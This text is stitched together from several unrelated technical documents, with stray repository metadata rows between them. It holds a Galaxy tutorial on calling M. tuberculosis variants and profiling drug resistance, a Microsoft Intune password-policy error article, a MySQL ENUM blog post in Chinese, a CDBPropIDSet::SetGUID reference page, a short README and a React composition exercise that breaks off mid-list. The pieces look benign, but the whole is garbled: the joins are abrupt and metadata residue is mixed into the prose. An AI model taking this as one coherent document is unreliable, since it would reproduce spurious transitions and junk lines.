For a more thorough explanation of NGS data quality control, you may want to have a look at the dedicated tutorial on ["Quality control"]({% link topics/sequence-analysis/tutorials/quality-control/tutorial.md %}).

> ### {% icon hands_on %} Hands-on: Quality control of the input datasets
>
> 1. Execute {% tool [FastQC](toolshed.g2.bx.psu.edu/repos/devteam/fastqc/fastqc/0.72+galaxy1) %} {% icon tool %} on both of your fastq datasets
>
>    - {% icon param-files %} *"Short read data from your current history"*: select both FASTQ datasets.
>
>    {% snippet snippets/select_multiple_datasets.md %}
>
>    The **FastQC** {% icon tool %} input form looks like this. You only need to pay attention to the top part
>    where *Short read data from your current history* is selected. Leave all the other parameters at their default
>    values and click *Execute*.
>
>    ![FastQC input and dependencies](../../images/mt_qc.png)
>
>    When you start this job, four new datasets (one with the calculated raw
>    data, another one with an html report of the findings for each input
>    dataset) will get added to your history.
>
{: .hands_on}

While one could examine the quality control report for each set of reads (forward and reverse) independently, it is quite useful to examine them side by side using the **MultiQC** tool.

> ### {% icon hands_on %} Hands-on: Combining QC results
>
> 1. Use {% tool [MultiQC](toolshed.g2.bx.psu.edu/repos/iuc/multiqc/multiqc/1.8+galaxy0) %} {% icon tool %} to aggregate the raw **FastQC** data of all input datasets into one report
>    - In *"Results"*
>      - *"Which tool was used generate logs?"*: `FastQC`
>      - In *"FastQC output"*
>        - *"Type of FastQC output?"*: `Raw data`
>        - {% icon param-files %} *"FastQC output"*: both *RawData*
>          outputs of **FastQC** {% icon tool %}
>
> 2. Using the {% icon galaxy-eye %} button, inspect the *Webpage* output produced by the tool
>
> > ### {% icon question %} Questions
> >
> > 1.
Based on the report, do you think preprocessing of the reads > > (trimming and/or filtering) will be necessary before mapping? > > > > > ### {% icon solution %} Solution > > > > > > 1. Sequence quality is quite good overall. If anything you might > > > consider trimming the 3' ends of reads (base qualities decline > > > slightly towards the 3' ends) or to filter out the small fraction > > > of reads with a mean base quality < 5. > > > We will run **Trimmomatic** {% icon tool %} on the > > > fastq datasets in the next step > > > > > {: .solution} > {: .question} > {: .hands_on} As these reads look like they need a bit of trimming, we can turn to the **Trimmomatic** tool to clean up our data. > ### {% icon hands_on %} Hands-on: Quality trimming > 1. Use {% tool [Trimmomatic](toolshed.g2.bx.psu.edu/repos/pjbriggs/trimmomatic/trimmomatic/0.36.5) %} {% icon tool %} to clean up the reads and remove the poor quality sections. > - *"Single-end or paired-end reads?"*: `Paired End (two separate input files)` > - {% icon param-files %} *"Input FASTQ file (R1/first of pair)"*: `004-2_1.fastq.gz` > - {% icon param-files %} *"Input FASTQ file (R2/second of pair)"*: `004-2_2.fastq.gz` > - *Select Trimmomatic operation to perform* > - Keep the default value of **Sliding window trimming** and adjust the average quality required to 30 > - *"+Insert Trimmomatic Operation"* > - *"Select Trimmomatic operation to perform"*: `Drop reads below a specified length (MINLEN)` > - *"Minimum length of reads to be kept"*: `20` > > 2. Inspect the output produced by Trimmomatic > > > ### {% icon question %} Questions > > > > 1. Why are there 4 output read files instead of 2? > > > > > ### {% icon solution %} Solution > > > > > > 1. There are 4 output files: Forwards paired and single reads and reverse paired and single reads. The single reads come about when one read in a pair of reads has failed the quality checks and so is deleted. 
The other half of the pair may still be good and so it is put into the single reads file for the appropriate direction. While un-paired reads might sometimes be useful, paired reads are more useful because both the sequence and the gap between reads ("insert size") can be used for further analysis. In a typical analysis, only paired reads are used.
> > >
> > {: .solution}
> {: .question}
{: .hands_on}

*Note:* We would normally examine our trimmed reads with **FastQC** and **MultiQC** again to see if the quality trimming has been successful, but in this tutorial we will move straight on to save time.

# Look for contamination with Kraken2 (optional)

We should also look for contamination in our reads. Sometimes, other sources of DNA accidentally or inadvertently get mixed in with our sample. Any reads from non-sample sources will confound our SNP analysis. **Kraken 2** is an effective way of looking at which species are represented in our reads, so we can easily spot possible contamination of our sample. Unfortunately **kraken2** uses a lot of RAM (typically 50GB when used with the *Standard* database), so you might want to skip this step if your environment doesn't have enough computing nodes able to process such jobs.

For an example of a probably-contaminated sample that does not use **kraken2** as part of its analysis, see the optional section on analysing *SRR12416842* at the end of this tutorial.

> ### {% icon hands_on %} Hands-on: Run Kraken2
>
> 1.
Execute {% tool [Kraken2](toolshed.g2.bx.psu.edu/repos/iuc/kraken2/kraken2/2.0.8_beta+galaxy0) %} {% icon tool %} with the following parameters > - *"Single or paired reads"*: `Paired` > - *"Forward Strand"*: `Trimmomatic on X (R1 paired)` > - *"Reverse Strand"*: `Trimmomatic on X (R2 paired)` > > - *"Print scientific names instead of just taxids"*: `Yes` > - *"Enable quick operation"*: `Yes` > - Under *"Create reports"*: > - *"Print a report with aggregrate counts/clade to file"*: `Yes` > - *"Select a Kraken2 database"*: `Standard` > > 2. Inspect the report produced by Kraken > > > ### {% icon question %} Questions > > > > 1. Was there any significant contamination of the sample? > > > > > ### {% icon solution %} Solution > > > > > > 1. 91.18% of the reads here have been positively identified as *Mycobacterium*. The others found were bacteria from the same kingdom. There were no contaminating human or viral sequences detected. > > > > > {: .solution} > {: .question} {: .hands_on} # Find variants with Snippy We will now run the Snippy tool on our reads, comparing it to the reference. Snippy is a tool for rapid bacterial SNP calling and core genome alignments. Snippy finds SNPs between a haploid reference genome and your NGS sequence reads. It will find both substitutions (snps) and insertions/deletions (indels). If we give Snippy an annotated reference in Genbank format, it will run a tool called SnpEff which will figure out the effect of any changes on the genes and other features. If we just give Snippy the reference sequence alone without the annotations, it will not run SnpEff. We have an annotated reference built from the inferred *M. tuberculosis* [ancestral reference genome](https://zenodo.org/record/3497110) and the gene annotation from the [H37Rv strain](https://www.ncbi.nlm.nih.gov/nuccore/NC_000962.3) so will use it in this case. > ### {% icon hands_on %} Hands-on: Run Snippy > > 1. 
{% tool [Snippy](toolshed.g2.bx.psu.edu/repos/iuc/snippy/snippy/4.5.0) %} {% icon tool %} with the following parameters
>    - *"Will you select a reference genome from your history or use a built-in index?"*: `Use a genome from history and build index`
>    - *"Use the following dataset as the reference sequence"*: `Mycobacterium_tuberculosis_ancestral_reference.gbk`
>    - *"Single or Paired-end reads"*: `Paired`
>    - *"Select first set of reads"*: `Trimmomatic on X (R1 paired)`
>    - *"Select second set of reads"*: `Trimmomatic on X (R2 paired)`
>
>    - Under *"Advanced parameters"*
>      - *"Minimum proportion for variant evidence"*: `0.1` (This is so we can see possible rare variants in our sample)
>    - Under *"Output selection"* select the following:
>      - *"The final annotated variants in VCF format"*
>      - *"A simple tab-separated summary of all the variants"*
>      - *"The alignments in BAM format"*
>      - Deselect any others.
>
> 2. Inspect the Snippy VCF output
>
> > ### {% icon question %} Questions
> >
> > 1. What type of variant is the first one in the list?
> >
> > 2. What was the effect of this variant on the coding region it was found in?
> >
> > 3. How many variants were found?
> >
> > > ### {% icon solution %} Solution
> > >
> > > 1. Substitution of a `C` to a `T`. This variant is supported by 134 reads.
> > >
> > > 2. According to SnpEff, it's a synonymous change in Rv0002.
> > >
> > > 3. 1086 variants are found. To count variants, look at how many non-comment lines are in the snippy VCF output, or how many lines (excluding the header) there are in the tab-separated summary. This is quite typical for *M. tuberculosis*.
> >
> {: .solution}
> {: .question}
{: .hands_on}

**RECAP**: So far we have taken our sample reads, cleaned them up a bit, checked for taxonomic association, compared the reads with our reference sequence and then called variants (SNPs and indels) between our sample and the reference genome. We have tried to mitigate a few errors along the way:

1.
Sequencing errors: these were addressed by the quality trimming step
2. Sample contamination: we used `kraken2` to assess the extent of this problem in our sample
3. Appropriate choice of a reference genome: we used a genome that is inferred to be ancestral to all *M. tuberculosis* for our analysis, and the diversity within Mtb is limited enough for us to rely on a single reference genome for the entire species.
4. Quality filtering in the mapping and variant calling stage: internally `snippy` uses tools like `bwa-mem` and `freebayes` that judge the quality of their predictions. `snippy` then uses this information to perform some filtering on variant calling predictions.

# Further variant filtering and TB-profiling

We still cannot entirely trust the proposed variants. In particular, there are regions of the *M. tuberculosis* genome that are difficult to effectively map reads to. These include the PE/PPE/PGRS genes, which are highly repetitive, and the IS (insertion sequence) sites. Secondly, when an insertion or deletion (indel) occurs in our sample relative to the reference, it can cause apparent, but false, single nucleotide variants to appear near the indel. Finally, where few reads map to a region of the reference genome, either because of a sequence deletion or because of a high GC content in the genomic region, we cannot be confident about the quality of variant calling in the region.

The `TB Variant Filter` tool can help filter out variants based on a variety of criteria, including those listed above.

> ### {% icon hands_on %} Hands-on: Run TB Variant Filter
> 1. {% tool [TB Variant Filter](toolshed.g2.bx.psu.edu/repos/iuc/tb_variant_filter/tb_variant_filter/0.1.3+galaxy0) %}: {% icon tool %} with the following parameters
>    - *"VCF file to be filter"*: `snippy on data XX, data XX, and data XX mapped reads vcf file`
>    - *"Filters to apply"*: Select `Filter variants by region`, `Filter variants close to indels` and `Filter sites by read alignment depth`.
>
> 2.
Open the new VCF file.
>
> > ### {% icon question %} Questions
> >
> > 1. How many of the original variants have now been filtered out?
> >
> > > ### {% icon solution %} Solution
> > >
> > > 1. `218` (The difference in the number of lines between the snippy vcf file and the filtered vcf file.)
> > >
> > {: .solution}
> {: .question}
{: .hands_on}

Now that we have a collection of *high quality variants* we can search them against variants known to be associated with drug resistance. The *TB Profiler* tool does this using a database of variants curated by Dr Jody Phelan at the London School of Hygiene and Tropical Medicine. It can do its own mapping and variant calling but also accepts mapped reads in BAM format as input, in which case it still applies its own variant calling and filtering.

Finally, TB Variant Report uses the COMBAT-TB [eXplorer](https://explorer.sanbi.ac.za) [database](https://academic.oup.com/bioinformatics/advance-article/doi/10.1093/bioinformatics/btz658/5554700) of *M. tuberculosis* genome annotation to annotate variants in Mtb. It also takes the output of *TB Profiler* and produces a neat report that is easy to browse and search.

> ### {% icon hands_on %} Hands-on: Run TB Profiler
> 1. {% tool [TB-Profiler profile](toolshed.g2.bx.psu.edu/repos/iuc/tbprofiler/tb_profiler_profile/2.8.4+galaxy1) %}: {% icon tool %} with the following parameters
>    - *"Input File Type"*: `BAM`
>    - *"Bam"*: `snippy on data XX, data XX, and data X mapped reads (bam)`
>
>    **TB Profiler** produces 3 output files: its own VCF file, a report about the sample including its likely lineages and any AMR found, and a `.json` formatted results file.
>
> 2. When *snippy* is run with Genbank format input it prepends `GENE_` to gene names in the VCF annotation. This causes a problem for *TB Variant Report*, so we need to edit the output with sed.
> > {% tool [Text transformation with sed](toolshed.g2.bx.psu.edu/repos/bgruening/text_processing/tp_sed_tool/1.1.1) %}: {% icon tool %} with the following parameters:
> > - *"SED Program"*: `s/GENE_//g`
>
> 3. {% tool [TB Variant Report](toolshed.g2.bx.psu.edu/repos/iuc/tbvcfreport/tbvcfreport/0.1.7+galaxy0) %}: {% icon tool %} with the following parameters
>    - *"Input SnpEff annotated M.tuberculosis VCF(s)"*: `TB-Profiler Profile VCF on data XX`
>    - *"TBProfiler Drug Resistance Report (Optional)"*: `TB-Profiler Profile on data XX: Results.json`
>
> 4. Open the drug resistance and variant report html files.
>
> > ### {% icon question %} Questions
> >
> > 1. What was the final lineage of the sample we tested?
> >
> > 2. Were there any drug resistances found?
> >
> > > ### {% icon solution %} Solution
> > >
> > > 1. `4`
> > >
> > > 2. Yes, resistance to isoniazid, rifampicin, ethambutol, pyrazinamide and streptomycin is predicted from mutations in the katG, rpoB, embB, pncA and rpsL genes respectively.
> > >
> > {: .solution}
> {: .question}
{: .hands_on}

# View Snippy output in JBrowse

We could go through all of the variants in the VCF files and read them out of a text table, but this is onerous and doesn't really give the context of the changes very well. It would be much nicer to have a visualisation of the SNPs and the other relevant data. In Galaxy we can use a tool called JBrowse.

> ### {% icon hands_on %} Hands-on: Run JBrowse
>
> 1.
{% tool [JBrowse](toolshed.g2.bx.psu.edu/repos/iuc/jbrowse/jbrowse/1.16.8+galaxy1) %} {% icon tool %} with the following parameters > - *"Reference genome to display"*: `Use a genome from history` > - *"Select the reference genome"*: `https://zenodo.org/record/3497110/files/MTB_ancestor_reference.fasta` > > This sequence will be the reference against which annotations are displayed > > - *"Produce Standalone Instance"*: `Yes` > - *"Genetic Code"*: `11: The Bacterial, Archaeal and Plant Plastid Code` > - *"JBrowse-in-Galaxy Action"*: `New JBrowse Instance` > - *"Track Group"* > > We will now set up three different tracks - these are datasets displayed underneath the reference sequence (which is displayed as nucleotides in FASTA format). We will choose to display the sequence reads (the .bam file), the variants found by snippy (the .gff file) and the annotated reference genome (the wildtype.gff) > > - **Track 1 - sequence reads**: Click on `Insert Track Group` and fill it with > - "Track Category" to `sequence reads` > - Click on `Insert Annotation Track` and fill it with > - "Track Type" to `BAM Pileups` > - "BAM Track Data" to `snippy on data XX, data XX, and data XX mapped reads (bam)` > - "Autogenerate SNP Track" to `Yes` > - "Track Visibility" to `On for new users` > - **Track 2 - variants**: Click on `Insert Track Group` and fill it with > - "Track Category" to `variants` > - Click on `Insert Annotation Track` and fill it with > - "Track Type" to `VCF SNPs` > - "SNP Track Data" to `TB Variant Filter on data XX` > - "Track Visibility" to `On for new users` > - **Track 3 - annotated reference**: Click on `Insert Track Group` and fill it with > - "Track Category" to `annotated reference` > - Click on `Insert Annotation Track` and fill it with > - "Track Type" to `GFF/GFF3/BED Features` > - "GFF/GFF3/BED Track Data" to `https://zenodo.org/record/3531703/files/Mycobacterium_tuberculosis_h37rv.ASM19595v2.45.chromosome.Chromosome.gff3` > - "JBrowse Track Type 
[Advanced]" to `Canvas Features` > - Click on "JBrowse Styling Options [Advanced]" > - "JBrowse style.label" to `product` > - "JBrowse style.description" to `product` > - "Track Visibility" to `On for new users` {: .hands_on} A new dataset will be created in your history, containing the JBrowse interactive visualisation. We will now view its contents and play with it by clicking the {% icon galaxy-eye %} (eye) icon of the `JBrowse on data XX and data XX - Complete` dataset. The JBrowse window will appear in the centre Galaxy panel. You can now click on the names of the tracks to add them in, try the vcf file and gff file. You can see where the variants are located and which genes they are in. If you click on the BAM file you can zoom right in to see the read alignments for each variant if you wish. # Different samples, different stories (optional) In [Zenodo](https://doi.org/10.5281/zenodo.3960260) we have included sample *18-1* from the same study (aka. [ERR1750907](https://www.ebi.ac.uk/ena/browser/view/ERR1750907)). This is also a southern African *M. tuberculosis* sample, but in some ways quite different from the sample we have analysed in the tutorial thus far. > ### {% icon hands_on %} Hands-on: Take a closer look at sample 18-1 > > 1. Fetch the data from Zenodo >``` >https://zenodo.org/record/3960260/files/018-1_1.fastq.gz >https://zenodo.org/record/3960260/files/018-1_2.fastq.gz >``` > > 2. Examine the sequence quality with {% tool [FastQC](toolshed.g2.bx.psu.edu/repos/devteam/fastqc/fastqc/0.72+galaxy1) %} {% icon tool %}. > > 3. Examine the sample composition with {% tool [Kraken2](toolshed.g2.bx.psu.edu/repos/iuc/kraken2/kraken2/2.0.8_beta+galaxy0) %} {% icon tool %}. > > > ### {% icon question %} Questions > > > > 1. What problems were discovered with sequence quality? > > > > 2. What did the kraken2 report show? How does this impact your assessment of variants discovered from this sample? > > > > > ### {% icon solution %} Solution > > > > > > 1. 
The quality of the sequence drops sharply towards the end of the sequences. Even more concerning, the sequence content changes across the length of the sample, which is not what we would expect at all. Finally, the sample seems to contain sequencing adapters, an artefact of the sequencing process that should be trimmed out before any sequence analysis. > > > > > > 2. Only 55% of the sequence reads are associated with the genus *Mycobacterium*. Perhaps the quality problems in the sequence reads contribute to this poor classification? They certainly will make variant calling less reliable. > > > > > {: .solution} > {: .question} {: .hands_on} As you can see, quality of sequence data strongly determines how useful it is for subsequent analysis. This is why quality control is always a first step before trying to call and interpret variants. What we do with a sample like this will depend on what resources we have available. Can we discard it and use other data for our analysis? Can we re-sequence? Can we clean it up, remove the adapters (using **Trimmomatic**, **fastp** or **cutadapt**) and perhaps use the Kraken2 output to decide which reads to keep? These are all possible strategies and there is no one answer for which is the correct one to pursue. The next example is *SRR12416842* from an Indonesia [study](https://www.microbiologyresearch.org/content/journal/jmm/10.1099/jmm.0.001221) of multi-drug resistant (MDR) tuberculosis. > ### {% icon hands_on %} Hands-on: Take a closer look at sample SRR12416842 > > 1. Fetch the data from EBI European Nucleotide Archive >``` >ftp://ftp.sra.ebi.ac.uk/vol1/fastq/SRR124/042/SRR12416842/SRR12416842_1.fastq.gz >ftp://ftp.sra.ebi.ac.uk/vol1/fastq/SRR124/042/SRR12416842/SRR12416842_2.fastq.gz >``` > > 2. Examine the sequence quality with {% tool [FastQC](toolshed.g2.bx.psu.edu/repos/devteam/fastqc/fastqc/0.72+galaxy1) %} {% icon tool %}. > > 3. 
Perform quality trimming with {% tool [Trimmomatic](toolshed.g2.bx.psu.edu/repos/pjbriggs/trimmomatic/trimmomatic/0.36.5) %} {% icon tool %}
>
> 4. Map the samples to the *M. tuberculosis* reference genome with {% tool [Snippy](toolshed.g2.bx.psu.edu/repos/iuc/snippy/snippy/4.5.0) %} {% icon tool %}
>
> > ### {% icon question %} Questions
> >
> > 1. Was the sequence quality good?
> >
> > 2. How many variants were discovered by snippy?
> >
> > > ### {% icon solution %} Solution
> > >
> > > 1. The **FastQC** result shows that while there is some dropoff in sequence quality (especially towards the end of the reads from the second dataset), the sequences are of good enough quality to analyse.
> > >
> > > 2. **snippy** discovered more than 15,000 variants. This is unusual for a *M. tuberculosis* sample, where we expect at most a few thousand variants across the length of the genome.
> >
> {: .solution}
> {: .question}
>
> 5. Run {% tool [samtools stats](toolshed.g2.bx.psu.edu/repos/devteam/samtools_stats/samtools_stats/2.0.2+galaxy2) %} {% icon tool %} on the *snippy on data XX, data XX, and data XX mapped reads (bam)* file. In the output, pay attention to the *sequences*, *reads mapped* and *reads unmapped* results.
>
> 6. Run the {% tool [BAM Coverage Plotter](toolshed.g2.bx.psu.edu/repos/iuc/jvarkit_wgscoverageplotter/jvarkit_wgscoverageplotter/20201223+galaxy0) %} {% icon tool %} on the mapped reads BAM file that you got from **snippy**.
>
> > ### {% icon question %} Questions
> >
> > 1. What percentage of reads mapped to the reference genome?
> >
> > 2. If you could run the **BAM Coverage Plotter** tool, was the coverage even across the genome?
> >
> > > ### {% icon solution %} Solution
> > >
> > > 1. Only 107351 out of 7297618, that is 1.5%, of the reads mapped to the reference genome.
> > >
> > > 2. The image from the **BAM Coverage Plotter** tool shows just a few vertical bars, suggesting that almost no reads mapped to the reference genome.
> > > > > > ![BAM Coverage Plot of SRR12416842 showing few reads mapped](../../images/mtb_poor_mapping.png) > > > > > > By contrast, reads from the `004-02` map evenly across the *M. tuberculosis* genome, with an average depth of over 100 reads, as shown in this output from **BAM Coverage Plotter**: > > > > > > ![BAM Coverage Plot of 004-02 showing reads mapped evenly](../../images/mtb_good_mapping.png) > > > > > > If you wish to investigate further, analyse the SRR12416842 sample with **kraken2**. > > {: .solution} > {: .question} {: .hands_on} There is something clearly wrong with sample SRR12416842, perhaps indicating sample contamination. This example of a sample that doesn't map to the reference genome illustrates that even when sequence quality is good, sequence data problems can become apparent in later steps of analysis and it is important to always have a sense of what results to expect. You can develop a better sense of what quality control results to expect by first practicing techniques with known data before analysing new samples. We hope you enjoyed this tutorial!
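As a closing aside, two of the quick calculations used in the questions above can be reproduced outside Galaxy. This is a minimal Python sketch (the VCF text here is an invented two-record example, not data from this tutorial): counting variants as the non-header lines of a VCF, and the mapped-read percentage for SRR12416842 from the `samtools stats` numbers quoted earlier.

```python
# Variant counting: every non-header line of a VCF is one variant record.
vcf_text = """##fileformat=VCFv4.2
#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO
Chromosome\t14\t.\tC\tT\t100\tPASS\t.
Chromosome\t250\t.\tG\tA\t99\tPASS\t.
"""
n_variants = sum(1 for line in vcf_text.splitlines()
                 if line and not line.startswith("#"))
print(n_variants)  # 2

# Mapped-read percentage for SRR12416842 (reads mapped / total sequences).
mapped, total = 107351, 7297618
print(round(100 * mapped / total, 1))  # 1.5
```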
--- title: Error -2016281112 deploying password policy description: Describes error -2016281112 when you deploy a password policy in Microsoft Intune. ms.date: 05/11/2020 ms.prod-support-area-path: Device protection --- # Error -2016281112 when you deploy password policy in Microsoft Intune This article fixes an issue in which you receive error -2016281112 when you deploy a password policy in Microsoft Intune. _Original product version:_ &nbsp; Microsoft Intune _Original KB number:_ &nbsp; 4095085 ## Symptom When you deploy a device restriction policy for password in Microsoft Intune, you receive error -2016281112. Here is an example case in which you specify the **Required password type** setting: ![Screenshot of the error code -2016281112.](./media/error-deploying-password-policy/error-code.png) ## Cause For Android and Windows desktop devices, password policies can't be immediately enforced on the users by using device restriction policies. If the user doesn't change the password as required by the policy, the error remains. ## Resolution To fix the issue, direct the users to change their password. > [!NOTE] > > - On the Android platform, the end user must accept the password change notification. > - On the Windows MDM desktop platform, the user must press CTRL+ALT+DEL and click **Change Password**, and then the new password rules will be enforced. ## More information For Android and Windows desktop devices, we recommend that you deploy a device-compliance policy to enforce the same password setting. This enforces the password change at device enrollment or blocks noncompliant devices from company resources. You can also notify the users by email and give them a grace period to be compliant. See [Configure actions for noncompliant devices in Intune](/mem/intune/protect/actions-for-noncompliance).
46.175
244
0.791554
eng_Latn
0.992123
6f53d1cd173ddb04da564e63382c5b02601000ce
55
md
Markdown
README.md
rlong/browser.app.McRemote
4e99d394d2940b925a0c2165a4f8808075edb5f9
[ "MIT" ]
null
null
null
README.md
rlong/browser.app.McRemote
4e99d394d2940b925a0c2165a4f8808075edb5f9
[ "MIT" ]
null
null
null
README.md
rlong/browser.app.McRemote
4e99d394d2940b925a0c2165a4f8808075edb5f9
[ "MIT" ]
null
null
null
# browser.app.vlc-control

Ionic PWA app to control VLC
18.333333
28
0.781818
eng_Latn
0.452756
6f53ef76d1abe53de3964f3c311983b9ed6acce6
3,145
markdown
Markdown
_posts/2019-03-1-mysql-enum.markdown
dukedukeduke/dukedukeduke.github.io
82ff6806e7f7737c67ae0333d992584ad2db8227
[ "MIT" ]
1
2019-04-09T08:29:00.000Z
2019-04-09T08:29:00.000Z
_posts/2019-03-1-mysql-enum.markdown
dukedukeduke/dukedukeduke.github.io
82ff6806e7f7737c67ae0333d992584ad2db8227
[ "MIT" ]
null
null
null
_posts/2019-03-1-mysql-enum.markdown
dukedukeduke/dukedukeduke.github.io
82ff6806e7f7737c67ae0333d992584ad2db8227
[ "MIT" ]
7
2019-02-18T09:20:09.000Z
2019-03-12T02:58:25.000Z
---
layout: post
title: "The MySQL ENUM type"
date: 2019-03-1 18:27:02 +0800
comments: true
tags:
- mysql
- enum
---

### References

https://dev.mysql.com/doc/refman/5.7/en/enum.html

https://segmentfault.com/q/1010000003709270

### Introduction

MySQL supports the ENUM type, which is actually stored as a TINYINT, so it offers both readability and efficiency.

An example. First, the setup on the MySQL side:

```
CREATE TABLE t_order (
    order_id int,
    products varchar(64),
    status ENUM('canceled', 'finished', 'delivering')
);

insert into t_order(order_id, products, status) values
(1, "笔记本电脑", "canceled"),
(2, "华为手机", "finished"),
(3, "小米手环", "delivering");

mysql> select * from t_order;
+----------+-----------------+------------+
| order_id | products        | status     |
+----------+-----------------+------------+
|        1 | 笔记本电脑      | canceled   |
|        2 | 华为手机        | finished   |
|        3 | 小米手环        | delivering |
+----------+-----------------+------------+
3 rows in set (0.00 sec)
```

On the application side, you simply read and write the values as strings.

### More

An ENUM is a string object with a value chosen from a list of permitted values that are enumerated explicitly in the column specification at table creation time. It has these advantages:

- Compact data storage in situations where a column has a limited set of possible values. The strings you specify as input values are automatically encoded as numbers. See Section 11.8, "Data Type Storage Requirements" for the storage requirements for ENUM types.
- Readable queries and output. The numbers are translated back to the corresponding strings in query results.

Creating and Using ENUM Columns

An ENUM column can have a maximum of 65,535 distinct elements. An enumeration value must be a quoted string literal.

For example, you can create a table with an ENUM column like this:

```
CREATE TABLE shirts (
    name VARCHAR(40),
    size ENUM('x-small', 'small', 'medium', 'large', 'x-large')
);

INSERT INTO shirts (name, size) VALUES
('dress shirt','large'),
('t-shirt','medium'),
('polo shirt','small');

SELECT name, size FROM shirts WHERE size = 'medium';
+---------+--------+
| name    | size   |
+---------+--------+
| t-shirt | medium |
+---------+--------+

UPDATE shirts SET size = 'small' WHERE size = 'large';

COMMIT;
```

Inserting 1 million rows into this table with a value of 'medium' would require 1 million bytes of storage, as opposed to 6 million bytes if you stored the actual string 'medium' in a VARCHAR column.

Each enumeration value has an index:

- The elements listed in the column specification are assigned index numbers, beginning with 1.
- The index value of the empty string error value is 0. This means that you can use the following SELECT statement to find rows into which invalid ENUM values were assigned:

```
mysql> SELECT * FROM tbl_name WHERE enum_col=0;
```

- The index of the NULL value is NULL.
- The term "index" here refers to a position within the list of enumeration values. It has nothing to do with table indexes.

For example, a column specified as ENUM('Mercury', 'Venus', 'Earth') can have any of the values shown here. The index of each value is also shown.

| Value     | Index |
|-----------|-------|
| NULL      | NULL  |
| ''        | 0     |
| 'Mercury' | 1     |
| 'Venus'   | 2     |
| 'Earth'   | 3     |
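The index rules above can be sketched in a few lines of Python. This is only a model of MySQL's documented behavior for illustration — the `enum_index` helper is invented here, not part of any MySQL client library, and it does not handle invalid values (which MySQL maps to the error index 0 on insert):

```python
def enum_index(permitted, value):
    """Model of how MySQL assigns indexes to ENUM values:
    listed elements get 1-based positions, the empty-string
    error value maps to 0, and NULL (None here) maps to NULL."""
    if value is None:
        return None                        # the index of NULL is NULL
    if value == "":
        return 0                           # empty-string error value
    return permitted.index(value) + 1      # 1-based list position

planets = ["Mercury", "Venus", "Earth"]
print(enum_index(planets, "Venus"))   # 2
print(enum_index(planets, ""))        # 0
print(enum_index(planets, None))      # None
```

Remember that these positions are list positions, not table indexes, exactly as the note above says.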
33.105263
261
0.660095
eng_Latn
0.979554
6f55120d433c0c0238e3d4fe45886c686641ceab
1,113
md
Markdown
docs/data/oledb/cdbpropidset-setguid.md
svick/cpp-docs
76fd30ff3e0352e2206460503b61f45897e60e4f
[ "CC-BY-4.0", "MIT" ]
1
2021-04-18T12:54:41.000Z
2021-04-18T12:54:41.000Z
docs/data/oledb/cdbpropidset-setguid.md
Mikejo5000/cpp-docs
4b2c3b0c720aef42bce7e1e5566723b0fec5ec7f
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/data/oledb/cdbpropidset-setguid.md
Mikejo5000/cpp-docs
4b2c3b0c720aef42bce7e1e5566723b0fec5ec7f
[ "CC-BY-4.0", "MIT" ]
1
2020-07-11T13:20:45.000Z
2020-07-11T13:20:45.000Z
---
title: "CDBPropIDSet::SetGUID | Microsoft Docs"
ms.custom: ""
ms.date: "11/04/2016"
ms.technology: ["cpp-data"]
ms.topic: "reference"
f1_keywords: ["CDBPropIDSet.SetGUID", "ATL::CDBPropIDSet::SetGUID", "SetGUID", "ATL.CDBPropIDSet.SetGUID", "CDBPropIDSet::SetGUID"]
dev_langs: ["C++"]
helpviewer_keywords: ["SetGUID method"]
ms.assetid: 8dd0f3bf-1490-4d53-9063-322b8d821bbe
author: "mikeblome"
ms.author: "mblome"
ms.workload: ["cplusplus", "data-storage"]
---
# CDBPropIDSet::SetGUID

Sets the GUID field in the **DBPROPIDSET** structure.

## Syntax

```cpp
void SetGUID(const GUID& guid) throw();
```

#### Parameters

`guid`
[in] A GUID used to set the **guidPropertySet** field of the [DBPROPIDSET](https://msdn.microsoft.com/en-us/library/ms717981.aspx) structure.

## Remarks

This field can be set by the [constructor](../../data/oledb/cdbpropidset-cdbpropidset.md) as well. Call this function if you use the default constructor for this class.

## Requirements

**Header:** atldbcli.h

## See Also

[CDBPropIDSet Class](../../data/oledb/cdbpropidset-class.md)
31.8
171
0.694519
kor_Hang
0.279088
6f5515eea08b4ced0ccc1f4e68fcbbf897747297
4,071
md
Markdown
curriculum/challenges/english/03-front-end-libraries/react/create-a-component-with-composition.english.md
InaSLew/freeCodeCamp
222948d5aca27f03d8a91bfa21d6c49cc82c663d
[ "BSD-3-Clause" ]
5
2020-07-09T10:19:39.000Z
2021-12-06T00:43:23.000Z
curriculum/challenges/english/03-front-end-libraries/react/create-a-component-with-composition.english.md
InaSLew/freeCodeCamp
222948d5aca27f03d8a91bfa21d6c49cc82c663d
[ "BSD-3-Clause" ]
58
2019-04-25T23:23:57.000Z
2021-07-28T23:18:44.000Z
curriculum/challenges/english/03-front-end-libraries/react/create-a-component-with-composition.english.md
InaSLew/freeCodeCamp
222948d5aca27f03d8a91bfa21d6c49cc82c663d
[ "BSD-3-Clause" ]
2
2019-05-29T14:58:56.000Z
2019-07-18T03:52:00.000Z
---
id: 5a24c314108439a4d4036164
title: Create a Component with Composition
challengeType: 6
isRequired: false
---

## Description
<section id='description'>
Now we will look at how we can compose multiple React components together. Imagine you are building an App and have created three components, a <code>Navbar</code>, <code>Dashboard</code>, and <code>Footer</code>.
To compose these components together, you could create an <code>App</code> <i>parent</i> component which renders each of these three components as <i>children</i>. To render a component as a child in a React component, you include the component name written as a custom HTML tag in the JSX. For example, in the <code>render</code> method you could write:
<blockquote>return (<br> &lt;App&gt;<br>&nbsp;&nbsp;&lt;Navbar /&gt;<br>&nbsp;&nbsp;&lt;Dashboard /&gt;<br>&nbsp;&nbsp;&lt;Footer /&gt;<br> &lt;/App&gt;<br>)</blockquote>
When React encounters a custom HTML tag that references another component (a component name wrapped in <code>&lt; /&gt;</code> like in this example), it renders the markup for that component in the location of the tag. This should illustrate the parent/child relationship between the <code>App</code> component and the <code>Navbar</code>, <code>Dashboard</code>, and <code>Footer</code>.
</section>

## Instructions
<section id='instructions'>
In the code editor, there is a simple functional component called <code>ChildComponent</code> and a class component called <code>ParentComponent</code>. Compose the two together by rendering the <code>ChildComponent</code> within the <code>ParentComponent</code>. Make sure to close the <code>ChildComponent</code> tag with a forward slash.
<strong>Note:</strong>&nbsp;<code>ChildComponent</code> is defined with an ES6 arrow function because this is a very common practice when using React. However, know that this is just a function. If you aren't familiar with the arrow function syntax, please refer to the JavaScript section.
</section>

## Tests
<section id='tests'>

```yml
tests:
  - text: The React component should return a single <code>div</code> element.
